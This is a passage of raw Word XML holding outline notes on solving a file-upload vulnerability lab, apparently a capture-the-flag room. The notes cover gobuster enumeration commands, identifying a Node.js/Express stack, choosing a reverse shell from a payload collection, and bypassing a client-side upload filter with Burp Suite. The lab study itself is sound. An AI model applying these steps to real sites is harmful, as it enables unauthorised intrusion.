        <w:t>Small file length limit may prevent upload of common reverse shell using</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A76FFC2" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>SOLUTION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="423EB9F3" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>ENUMERATION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B707E82" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t xml:space="preserve">“gobuster dir -u </w:t>
      </w:r>
      <w:hyperlink r:id="rId77" w:history="1">
        <w:r w:rsidRPr="00F512ED">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://jewel.uploadvulns.thm</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00F512ED">
        <w:t xml:space="preserve"> -w /usr/share/wordlists/dirbuster/directory-list-txt -x php,txt,html -t 250 | tee gobuster-root-big”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B23C43" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>ID directories</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41BE93B5" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>200 code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47355787" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:rPr>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>Navigate to these pages in URL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="646BA88A" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:rPr>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>Look for how these pages interact with other pages</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="112D8F73" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Re-Run with directories attached with new wordlists</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BE4F609" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t xml:space="preserve">“gobuster dir -u </w:t>
      </w:r>
      <w:hyperlink r:id="rId78" w:history="1">
        <w:r w:rsidRPr="00F512ED">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://jewel.uploadvulns.thm/&lt;directory</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00F512ED">
        <w:t>&gt; -w &lt;wordlist&gt; -t 250 -x &lt;extension being sought, such as jpg&gt; | tee gobuster-&lt;directory&gt;-default</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39BF8725" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Useful for searching through directories to ensure nothing is missed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03B0620C" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>CHECK SOURCE CODE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20AE2467" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:lastRenderedPageBreak/>
        <w:t>Ctrl+u</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53B7462E" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Find common or recurring directories that are used to pull from for content</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="390C267B" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>“href=&lt;directory&gt;”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="222D195F" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>“src=&lt;directory&gt;”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37331F70" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Fixed content is unlikely to be useful</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F49E1EE" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Wappalyzer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="106D43ED" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Programming Languages</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD3941E" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Node.js = PHP reverse will NOT work</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E62581" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>PayloadsAllTheThings (GITHUB)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6539A133" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>#search for code specific</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EEA0B79" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>In this case node.js</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C71B04" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="7"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Copy and paste code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28643E3F" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="7"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Edit options in TextEditor as necessary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28B4CFE7" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:rPr>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>Will not allow direct traversal to upload PATH as PHP website would</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B98A2AA" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:rPr>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>Need another means of activating upload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69A5341D" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:rPr>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>Above mentioned Admin page</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01CD2D02" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Web Frameworks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37444B7E" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>X-Powered-By (Burpsuite)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5210E93B" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Express</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DD05FB6" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Node.js Express Framework</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DF4BCCE" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Confirm Wappalyzer findings and what that means for your hack tactics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60FC160F" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>CTRL-SHIFT + I</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41E71497" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Inspector</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="590DC836" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>CSS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00C693EA" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>URLs for Images</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2538BF" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Can assist in determining where certain file types go/are stored</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77FECED3" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>ATTEMPT UPLOAD OF SHELL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05517F59" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Confirm Client-Side Filter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="228F3534" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Extension requirements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AF8C462" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Intercept Client Request (Burpsuite)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6492E227" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Remove File Extension Filter in Intercept Client Requests (^js$|)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71FAEA6D" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>CTRL-F5 when refreshing page to clear cache so JS will not be saved and preloaded</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="420045E4" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Will require Server to re-send Upload Filter Script, which can be intercepted</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F86240E" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
